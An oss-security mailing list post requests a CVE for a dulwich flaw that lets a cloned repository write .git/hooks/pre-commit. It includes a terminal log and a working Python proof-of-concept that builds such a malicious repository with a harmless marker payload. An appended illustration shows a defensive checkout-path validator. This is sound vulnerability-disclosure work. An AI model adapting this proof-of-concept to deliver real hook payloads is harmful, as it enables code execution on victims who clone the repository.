Date: Sat, 21 Mar 2015 10:26:24 +0100
From: Salvatore Bonaccorso <>
To: OSS Security Mailinglist <>
Cc: CVE Assignments MITRE <>,
	Jelmer Vernooij <>
Subject: Possible CVE Request: dulwich: does not prevent to write files in
 commits with invalid paths to working tree


While looking at CVE-2014-9390 I noticed for dulwich reported by
Gary van der Merwe. Does the scope of CVE-2014-9390 also include these bits
from the above:

dulwich happily clones a repository which contains a commit with invalid
paths, say .git/hooks/pre-commit, and thus allowing execution of code
on subsequent commits.

dummy@...:~$ python 
dummy@...:~$ dulwich clone PoC.git foo
Counting objects: 5, done.
Compressing objects: 100% (2/2), done.
Total 5 (delta 0), reused 5 (delta 0)
Checking out HEADdummy@...:~$ cd foo/
dummy@...:~/foo$ git commit -m "test" --allow-empty
You just got cracked! (not really but you could have been!)
[master 9588153] test
dummy@...:~/foo$ ls -l /tmp/cracked 
-rw-r--r-- 1 dummy dummy 0 Mar 21 10:24 /tmp/cracked

Upstream (Jelmer Vernooij) has fixed this with commit;a=commitdiff;h=091638be3c89f46f42c3b1d57dc1504af5729176

Does this need a separate CVE from CVE-2014-9390? 


#!/usr/bin/env python2

import os
import time

from dulwich.repo import Repo
from dulwich.objects import Blob, Tree, Commit, parse_timezone

repo_dir = 'PoC.git'
repo = Repo.init_bare(repo_dir)

# Blob for the hook script: touches a marker file and prints a message.
evil_file = Blob.from_string("""#!/usr/bin/env python
import subprocess
subprocess.call(["/bin/touch", "/tmp/cracked"])
print('You just got cracked! (not really but you could have been!)')
""")

# Nested trees so that the blob's path in the commit is .git/hooks/pre-commit.
hooks_tree = Tree()
hooks_tree.add('pre-commit', 0o100755, evil_file.id)

git_tree = Tree()
git_tree.add('hooks', 0o40000, hooks_tree.id)

root_tree = Tree()
root_tree.add('.git', 0o40000, git_tree.id)

commit = Commit()
commit.tree = root_tree.id
author = "Dr. Evil <drevil@...xxxxxxxx>"
commit.author = commit.committer = author
commit.commit_time = commit.author_time = int(time.time())
tz = parse_timezone('-0200')[0]
commit.commit_timezone = commit.author_timezone = tz
commit.encoding = "UTF-8"
commit.message = "Evil commit"

# Store all objects in the bare repository and point master at the commit.
repo.object_store.add_objects([
    (evil_file, None),
    (hooks_tree, None),
    (git_tree, None),
    (root_tree, None),
    (commit, None),
])

repo.refs['refs/heads/master'] = commit.id
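
An added example, not part of the original post and not dulwich's own code: a checkout-time check that refuses tree entries such as .git/hooks/pre-commit before anything is written to the working tree. It goes beyond the exact case in the post by also rejecting case variants and NTFS-style aliases of .git; the function names and the sample tree are hypothetical and constructed for illustration.

```python
# Added illustration; names are hypothetical, not dulwich's API.
DIR_MODE = 0o40000


def is_unsafe_component(name: bytes) -> bool:
    """True if one tree-entry name must never be created in a work tree."""
    if name in (b"", b".", b".."):
        return True
    if b"/" in name or b"\x00" in name:
        return True
    # Case-insensitive filesystems treat .GIT as .git; NTFS also drops
    # trailing dots/spaces and exposes the short alias git~1.
    folded = name.lower().rstrip(b". ")
    return folded in (b".git", b"git~1")


def plan_checkout(tree: dict, prefix: bytes = b""):
    """Split a tree into (paths safe to write, paths rejected).

    `tree` maps entry name -> (mode, child); child is a dict for
    directories and bytes for blobs. Every path component is checked,
    and a rejected directory is never descended into.
    """
    safe, rejected = [], []
    for name, (mode, child) in sorted(tree.items()):
        path = prefix + name
        if is_unsafe_component(name):
            rejected.append(path)
            continue
        if mode == DIR_MODE:
            sub_safe, sub_rejected = plan_checkout(child, path + b"/")
            safe += sub_safe
            rejected += sub_rejected
        else:
            safe.append(path)
    return safe, rejected


# Constructed sample: same shape as the commit in the post, plus a
# case-variant .GIT directory nested one level down.
HOOK = {b"pre-commit": (0o100755, b"#!/bin/sh\n")}
SAMPLE_TREE = {
    b"README": (0o100644, b"hello\n"),
    b".git": (DIR_MODE, {b"hooks": (DIR_MODE, HOOK)}),
    b"src": (DIR_MODE, {
        b".GIT": (DIR_MODE, {b"config": (0o100644, b"")}),
        b"main.py": (0o100644, b""),
    }),
}

if __name__ == "__main__":
    print(plan_checkout(SAMPLE_TREE))
```
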
